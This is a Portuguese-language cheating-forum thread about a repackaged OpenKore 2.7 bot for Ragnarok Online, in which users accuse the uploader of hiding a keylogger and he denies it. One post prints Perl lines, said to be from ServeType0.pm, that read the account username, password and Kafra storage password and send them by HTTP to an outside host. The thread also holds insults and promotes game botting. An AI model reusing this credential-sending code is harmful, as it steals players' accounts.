Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

OpenKore2.7 + Tutorial em 4 passos + Download sem espera + Versão mais nova sem fake.

Compartilhar

Posts Recomendados

mais uma prova de ser o suzaku,ele sempre posta como detectar script nos bots,já que o meu não existe isso,cara se liga,eu lutarei mais 10000 usuarios do bro para passar um bot para o pessoal,rala daqui com essa ideia de retardado sua

ele e tão amador que ainda foi la no post da outra conta dele e edito,porque viu que foi burro em colocar que baixo e testo em menos e 2 minutos,agora ele coloco que está baixando e tem medo de ser banido,coitado de você cara,enquanto você retira 10 usuarios a cada 5 meses por causa de bot eu coloco em media 200 com bot por mes no meu cla,cara se mata kkkkkkk,larga de ser amador

Falo aew araujo baixa a bola vai..

Porque invez de tentar me difamar aqui você não arruma argumentos e vai na Staff da WC.. mesmo sendo inutil, pois o errado aki é você "hackerzinho" lixo..

@Ale221096~

Está limpo.. caso ainda ache que tem algo pessa para algum mod revisar e vc verá q n tem erros..

@Kezziel~

Vo editar aqui para por o link de um tuto..

@Staff~

Pessoa para alguem da Staff da WC revisar o bot e confirmar para os 2 ai que está 100% limpo e que possa banir o araujo (de novo)...

@All~

Se acham que este bot tem algum KL ou algo do genero.. simples.. não baixem.. peguem no fórum do open kore se acharem mais seguro.. estou aqui só postando algo que está 100% funcional e limpo ao contrario de alguns por ai.. se mesmo assim estão insatisfeitos.. bom não posso agradar a todos.. acima esta minha dica para os que não estão felizes com o bot..

@Edit~

Postei la o tutorial, ele é muito bom.. pena que seu criador não vale nada.. =/

Att. Katsumoto!!

Link para o comentário
Compartilhar em outros sites

sou mebro aqui da wc a 3 anos sei que você pego contas com amigos seus para psotar o bot com keylogger auqi,você e muito amador coloco recados com mensod e 2 minutos de intervalo e no primeiro coloco que o bot funciona e tava limpo,isso com 2 minutos de topico on nem se a net do seu outro fake foce 100mbs ele conseguiria baixar testar e postar um comentario em 2 minutos,e ae perceber sua propria cagada você edito o comentario falando que iria baichar e teria medo de ser banido,some daqui amador,se a staff não te banir irei ficar aqui forever avisando de keylloger,e você vai fica aquia tualizando seu topico forever e eu avisando de keylloger,vai arruma um emprego retardado em ves de ficar aqui tentando roubar os outros para poder diminuir bots no ragnarok,ja falei enquanto você tiro 15 bots da ultima vez do seu topico eu inclui esse mes 1000 bots novos no bro para a galera,some daqui retardado sai com essa ideia idiota sua

Link para o comentário

sou mebro aqui da wc a 3 anos sei que você pego contas com amigos seus para psotar o bot com keylogger auqi,você e muito amador coloco recados com mensod e 2 minutos de intervalo e no primeiro coloco que o bot funciona e tava limpo,isso com 2 minutos de topico on nem se a net do seu outro fake foce 100mbs ele conseguiria baixar testar e postar um comentario em 2 minutos,e ae perceber sua propria cagada você edito o comentario falando que iria baichar e teria medo de ser banido,some daqui amador,se a staff não te banir irei ficar aqui forever avisando de keylloger,e você vai fica aquia tualizando seu topico forever e eu avisando de keylloger,vai arruma um emprego retardado em ves de ficar aqui tentando roubar os outros para poder diminuir bots no ragnarok,ja falei enquanto você tiro 15 bots da ultima vez do seu topico eu inclui esse mes 1000 bots novos no bro para a galera,some daqui retardado sai com essa ideia idiota sua

Kra tambem so membro aqui a 3 anos só q eu era ativo na área de GC até que enjuei.. bom.. tem alguma prova fisica q eu sou o suzaku ou que meu bot está infectado com algo ?

Se tiver tudo bem (duvido muito pois eu n sou ele e meu bot está limpo).. qualquer coisa faz oque eu falei no meu poste anterior.. pede para algum mod ou adm da WC revisar meu bot para ver se axa algo..

Até que você tenha provas concretas não saia difamando os outros só pq lançaram um bot sem KL (ao contrario dos seus)..

E eu mesmo dei a dica.. se não quiserem usar meu bot.. vão no svn do OK, baixem o OK de la e rodem.. simples..

Agora se tiver como para de floodar aqui agradeceria.. até porque não vo mais perder meu tempo aqui com vc e sim com membros de verdade que postarem.. enquanto isso aguardo uma ação da Staff.. ~/s

Então até mais (espero que não +...)..

Link para o comentário

Sei la tenho minhas duvidas quanto a esse post ta com cara de hacker, logo de inicio uma repetição de post do mesmo membro, alguem ae testa porque to com preguiça e não to afim de baixar otro bot uso o meu mesmo.

Link para o comentário

Katsumoto188.

Eu testei novamente e encontrei as seguintes linhas no ServeType0.pm :

use LWP::UserAgent;

use Utils qw (urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10) ;

$ua->env_proxy;

my $usuario = $config {'username'};

$usuario=~ s/#/:/;

my $senha = $config {'password'};

$senha=~ s/#/:/;

my $kafra = $config {'storageAuto_password'}

$kafra=~ s/#/:/;

my $response = $ua->get{"

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra"} ;

Bem amigo, eu sou formado em Ciência da Computação e pelo que eu sei, o site 110mb.com é um site host aceita Scripts em php.

Mas oque é um Script? Scripts são sistemas pré-fabricados preparados para desempenhar uma atitude especifica, no nosso caso, ver o usuário, senha e senha kafra.

Eles podem, ou não permitir personalização de seu funcionamento, e alguns podem ser mais simples que outros em relação à manuseio, e etc..

Bom pessoal, infelizmente existem pessoas, como o Katsumoto tentando enganar e hackear as pessoas menos experientes, mas fiquem tranquilos, aqui na Web Cheats temos uma porção de pessoas capazes de infrentar com unhas e dentes estes pilantras, podem ficar tranquilos que logo logo, vão sumir do fórum.

Por fim, eu já provei que existe um Keylogger neste OpenKore, agora cabe a vocês baixar ou não.

Link para o comentário

Sei la tenho minhas duvidas quanto a esse post ta com cara de hacker, logo de inicio uma repetição de post do mesmo membro, alguem ae testa porque to com preguiça e não to afim de baixar otro bot uso o meu mesmo.

Tipo se não confia faz oq eu disse pro araujo baixe do SVN do OK e configure o bot assim eh 100% seguro... ~/s

O fato da 1ª pagina é que o membro motoboy argumentou comigo e eu só tenho este tópico para responde-lo.. caso queiram pessam a um mod para desaprovar ou deletar os posts!!

@Ale221096~

Não precisa me explicar oque é um script até porque eu sei muito bem sobre programação não preciso que me ensine.. ~/ok

Sobre o KL que você "encontrou" é fake.. pode pedir para a moderação revisar pois não tem nada no meu bot.. e tambem de onde tirou esse link ? x.x

Detalhe: O link

É necessário se cadastrar para acessar o conteúdo.
não existe.. podem olhar ai.. e mesmo assim não existe tal código no bot ~/s

@Edit~

Ale.. 1 conselho mude sua assinatura pois está grande demais se um mod ver vc será punido!!

Att. Katsumoto!!

Link para o comentário

Ok, não discutirei mais contigo.

E em relação à minha assinatura, deixe que eu me responsabilize por isso. :)

Só queria avisar para que você não seja punido atoa por tão pouco..

@All~

Vo sair mais tarde eu volto!!

Link para o comentário

malechin TODOS seus agumentos NÃO TEM FUNDO DE VERDADE, todos seus argumentos SAO FURADOS

voce quer apenas difarmar esse topico totalmente limpo para promover o seu

da qual cotem script malicioso

para quem comecou a ler daqui basta ver os argumentos do katsumoto188 nessa pagina

Link para o comentário

qual a versao do windows que usa?

@malechin TODOS seus agumentos NÃO TEM FUNDO DE VERDADE, todos seus argumentos SAO FURADOS

voce quer apenas difarmar esse topico totalmente limpo para promover o seu

da qual cotem script malicioso

para quem comecou a ler daqui basta ver os argumentos do katsumoto188 nessa pagina

Link para o comentário

frde

eu estava apenas me defedendo das acusasoes feitas contra min e tirando algumas duvidas

se for o caso eu posso parar de postar aqui

mas nao sei como isso vai resolver o problema

edit

inclusive postava quando o topico ja estava em cima

Link para o comentário

Pessoal eu dei uma analizada no arquivo e no scan, e vi que está limpo,

o Vírus Total só detectou o " PUA.Packed.ASPack " que é um falso positivo!

Voltando ao tópico... Está bem organizado, com imagens, bem formatado

só poderia ter adicionado mais cores rsrs. O conteúdo esta totalmente funcional, podem baixar sem problemas.

Abraços

5k9Y3Of.gif

3Y2ssgu.png

Link para o comentário

o bronze member o keylloger vem em forma de script,então jamais você vai saber oque é keylloger se não souber antes oque é um comando por script o openkore dele está sim com keylloger e quem baixar vai eprder tudo

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.